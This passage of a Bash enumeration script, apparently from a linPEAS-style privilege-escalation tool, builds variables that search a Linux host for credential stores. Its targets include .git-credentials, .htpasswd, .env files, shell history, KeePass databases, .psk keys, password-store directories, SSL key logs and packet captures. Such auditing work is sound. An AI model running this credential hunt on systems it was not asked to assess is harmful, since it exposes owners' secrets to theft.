grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "\.pypirc$" | sort | uniq | head -n 70) 886 PSTORAGE_POSTFIX=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "aliases$|postfix$" | sort | uniq | head -n 70) 887 PSTORAGE_CLOUDFLARE=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "\.cloudflared$" | sort | uniq | head -n 70) 888 PSTORAGE_HISTORY=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E ".*_history.*$" | sort | uniq | head -n 70) 889 PSTORAGE_HTTP_CONF=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "httpd\.conf$" | sort | uniq | head -n 70) 890 PSTORAGE_HTPASSWD=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "\.htpasswd$" | sort | uniq | head -n 70) 891 PSTORAGE_LDAPRC=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "\.ldaprc$" | sort | uniq | head -n 70) 892 PSTORAGE_ENV=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -v -E 'example' | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "\.env.*$" | sort | uniq | head -n 70) 893 PSTORAGE_PROXY_CONFIG=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E '^/etc/environment$' | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "environment$|apt\.conf$|apt\.conf\.d$" | sort | uniq | head -n 70) 894 PSTORAGE_SNIFFING_ARTIFACTS=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E ".*\.pcap$|.*\.pcapng$|keys\.log$|sslkeylog\.log$" | sort | uniq | head -n 70) 895 PSTORAGE_MSMTPRC=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "\.msmtprc$" | sort | uniq | head -n 70) 896 PSTORAGE_INFLUXDB=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "influxdb\.conf$" | sort | uniq | head -n 70) 897 PSTORAGE_ZABBIX=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "zabbix_server\.conf$|zabbix_agentd\.conf$|zabbix$" | sort | uniq | head -n 70) 898 PSTORAGE_GITHUB=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "\.github$|\.gitconfig$|\.git-credentials$|\.git$" | sort | uniq | head -n 70) 899 PSTORAGE_SVN=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "\.svn$" | sort | uniq | head -n 70) 900 PSTORAGE_KEEPASS=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E ".*\.kdbx$|KeePass\.config.*$|KeePass\.ini$|KeePass\.enforced.*$" | sort | uniq | head -n 70) 901 PSTORAGE_PRE_SHARED_KEYS=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E ".*\.psk$" | sort | uniq | head -n 70) 902 PSTORAGE_PASS_STORE_DIRECTORIES=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "\.password-store$" | sort | uniq | head -n 70) 903 PSTORAGE_FTP=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "vsftpd\.conf$|.*\.ftpconfig$|ffftp\.ini$|ftp\.ini$|ftp\.config$|sites\.ini$|wcx_ftp\.ini$|winscp\.ini$|ws_ftp\.ini$" | sort | uniq | head -n 70) 904 PSTORAGE_SAMBA=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "smb\.conf$" | sort | uniq | head -n 70) 905 PSTORAGE_DNS=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}usr" | grep -E "bind$" | sort | uniq | head -n 70) 906 PSTORAGE_SEEDDMS=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "seeddms.*$" | sort | uniq | head -n 70) 907 PSTORAGE_DDCLIENT=$(echo -e 